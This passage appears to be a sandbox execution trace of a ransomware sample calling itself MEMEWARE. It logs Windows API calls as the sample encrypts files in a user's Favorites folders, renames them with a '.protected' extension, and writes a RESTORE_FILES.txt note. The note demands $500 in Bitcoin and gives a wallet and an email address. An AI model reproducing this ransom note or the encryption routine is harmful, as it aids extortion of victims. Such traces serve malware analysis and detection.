lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.854] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.854] CloseHandle (hObject=0xd4) returned 1 [0091.855] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.protected") returned 92 [0091.855] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url.protected")) 
returned 1 [0091.856] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0091.856] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0091.856] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\RESTORE_FILES.txt") returned 80 [0091.856] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.857] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0091.857] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0091.858] lstrlenA (lpString="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") returned 684 [0091.858] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0091.858] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0091.858] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, 
lpOverlapped=0x0) returned 1 [0091.858] CloseHandle (hObject=0xb4) returned 1 [0091.859] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.859] lstrcmpiW (lpString1="MSN Websites", lpString2="Windows") returned -1 [0091.859] lstrcmpiW (lpString1="MSN Websites", lpString2="Program Files") returned -1 [0091.860] lstrcmpiW (lpString1="MSN Websites", lpString2="Program Files (x86)") returned -1 [0091.860] lstrcmpiW (lpString1="MSN Websites", lpString2="$Recycle.bin") returned 1 [0091.860] lstrcmpiW (lpString1="MSN Websites", lpString2="System Volume Information") returned -1 [0091.860] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned 56 [0091.860] lstrcmpW (lpString1="MSN Websites", lpString2=".") returned 1 [0091.860] lstrcmpW (lpString1="MSN Websites", lpString2="..") returned 1 [0091.860] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*") returned 58 [0091.860] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0091.863] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.863] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0091.863] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0091.863] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.863] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.863] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\.") returned 58 [0091.863] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.863] FindNextFileW (in: hFindFile=0x47b9d0, 
lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.863] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.863] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0091.863] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0091.863] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.863] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.863] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\..") returned 59 [0091.863] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.863] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.863] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.863] lstrcmpiW (lpString1="MSN Autos.url", lpString2="Windows") returned -1 [0091.863] lstrcmpiW (lpString1="MSN Autos.url", lpString2="Program Files") returned -1 [0091.863] lstrcmpiW (lpString1="MSN Autos.url", lpString2="Program Files (x86)") returned -1 [0091.863] lstrcmpiW (lpString1="MSN Autos.url", lpString2="$Recycle.bin") returned 1 [0091.863] lstrcmpiW (lpString1="MSN Autos.url", lpString2="System Volume Information") returned -1 [0091.863] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url") returned 70 [0091.863] StrStrIW (lpFirst="MSN Autos.url", lpSrch=".protected") returned 0x0 [0091.863] lstrcmpW (lpString1="MSN Autos.url", lpString2="RESTORE_FILES.txt") returned -1 [0091.863] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.864] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) 
returned 1 [0091.864] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.864] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url") returned 70 [0091.864] StrStrW (lpFirst="MSN Autos.url", lpSrch=".txt") returned 0x0 [0091.864] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url") returned 70 [0091.864] StrStrW (lpFirst="MSN Autos.url", lpSrch=".rar") returned 0x0 [0091.865] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url") returned 70 [0091.865] StrStrW (lpFirst="MSN Autos.url", lpSrch=".zip") returned 0x0 [0091.865] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.865] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.866] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.866] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.866] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.866] WriteFile (in: 
hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.866] CloseHandle (hObject=0xd4) returned 1 [0091.867] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.protected") returned 80 [0091.867] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url.protected")) returned 1 [0091.868] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.868] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="Windows") returned -1 [0091.868] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="Program Files") returned -1 [0091.868] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="Program Files (x86)") returned -1 [0091.868] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="$Recycle.bin") returned 1 [0091.868] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="System Volume Information") returned -1 [0091.868] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url") returned 78 [0091.868] StrStrIW (lpFirst="MSN Entertainment.url", lpSrch=".protected") returned 0x0 [0091.868] lstrcmpW (lpString1="MSN Entertainment.url", lpString2="RESTORE_FILES.txt") returned -1 [0091.868] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.868] 
CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.868] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.927] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url") returned 78 [0091.927] StrStrW (lpFirst="MSN Entertainment.url", lpSrch=".txt") returned 0x0 [0091.927] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url") returned 78 [0091.927] StrStrW (lpFirst="MSN Entertainment.url", lpSrch=".rar") returned 0x0 [0091.927] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url") returned 78 [0091.927] StrStrW (lpFirst="MSN Entertainment.url", lpSrch=".zip") returned 0x0 [0091.927] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.927] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.927] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.928] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.928] 
WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.928] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.928] CloseHandle (hObject=0xd4) returned 1 [0091.929] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.protected") returned 88 [0091.929] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url.protected")) returned 1 [0091.930] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.930] lstrcmpiW (lpString1="MSN Money.url", lpString2="Windows") returned -1 [0091.930] lstrcmpiW (lpString1="MSN Money.url", lpString2="Program Files") returned -1 [0091.930] lstrcmpiW (lpString1="MSN Money.url", lpString2="Program Files (x86)") returned -1 [0091.930] lstrcmpiW (lpString1="MSN Money.url", lpString2="$Recycle.bin") returned 1 [0091.930] lstrcmpiW (lpString1="MSN Money.url", lpString2="System Volume Information") returned -1 [0091.930] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url") returned 70 [0091.930] StrStrIW (lpFirst="MSN Money.url", lpSrch=".protected") returned 0x0 
[0091.931] lstrcmpW (lpString1="MSN Money.url", lpString2="RESTORE_FILES.txt") returned -1 [0091.931] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.931] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.931] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.932] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url") returned 70 [0091.932] StrStrW (lpFirst="MSN Money.url", lpSrch=".txt") returned 0x0 [0091.932] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url") returned 70 [0091.932] StrStrW (lpFirst="MSN Money.url", lpSrch=".rar") returned 0x0 [0091.932] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url") returned 70 [0091.932] StrStrW (lpFirst="MSN Money.url", lpSrch=".zip") returned 0x0 [0091.932] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.933] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.933] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.934] 
SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.934] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.934] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.934] CloseHandle (hObject=0xd4) returned 1 [0091.935] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.protected") returned 80 [0091.935] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url.protected")) returned 1 [0091.936] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.936] lstrcmpiW (lpString1="MSN Sports.url", lpString2="Windows") returned -1 [0091.936] lstrcmpiW (lpString1="MSN Sports.url", lpString2="Program Files") returned -1 [0091.936] lstrcmpiW (lpString1="MSN Sports.url", lpString2="Program Files (x86)") returned -1 [0091.936] lstrcmpiW (lpString1="MSN Sports.url", lpString2="$Recycle.bin") returned 1 [0091.936] lstrcmpiW (lpString1="MSN Sports.url", lpString2="System Volume Information") returned -1 [0091.936] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN 
Websites\\MSN Sports.url") returned 71 [0091.936] StrStrIW (lpFirst="MSN Sports.url", lpSrch=".protected") returned 0x0 [0091.936] lstrcmpW (lpString1="MSN Sports.url", lpString2="RESTORE_FILES.txt") returned -1 [0091.936] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.936] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.936] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.941] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url") returned 71 [0091.941] StrStrW (lpFirst="MSN Sports.url", lpSrch=".txt") returned 0x0 [0091.941] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url") returned 71 [0091.941] StrStrW (lpFirst="MSN Sports.url", lpSrch=".rar") returned 0x0 [0091.941] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url") returned 71 [0091.941] StrStrW (lpFirst="MSN Sports.url", lpSrch=".zip") returned 0x0 [0091.942] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.942] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.942] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, 
lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.943] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.943] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.943] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.944] CloseHandle (hObject=0xd4) returned 1 [0091.944] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.protected") returned 81 [0091.944] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url.protected")) returned 1 [0091.945] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.945] lstrcmpiW (lpString1="MSN.url", lpString2="Windows") returned -1 [0091.945] lstrcmpiW (lpString1="MSN.url", lpString2="Program Files") returned -1 [0091.945] lstrcmpiW (lpString1="MSN.url", lpString2="Program Files (x86)") returned -1 [0091.945] lstrcmpiW (lpString1="MSN.url", lpString2="$Recycle.bin") returned 1 [0091.945] lstrcmpiW (lpString1="MSN.url", lpString2="System Volume Information") returned -1 [0091.945] wnsprintfW (in: 
pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url") returned 64 [0091.945] StrStrIW (lpFirst="MSN.url", lpSrch=".protected") returned 0x0 [0091.945] lstrcmpW (lpString1="MSN.url", lpString2="RESTORE_FILES.txt") returned -1 [0091.945] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.946] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.946] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.949] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url") returned 64 [0091.949] StrStrW (lpFirst="MSN.url", lpSrch=".txt") returned 0x0 [0091.949] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url") returned 64 [0091.949] 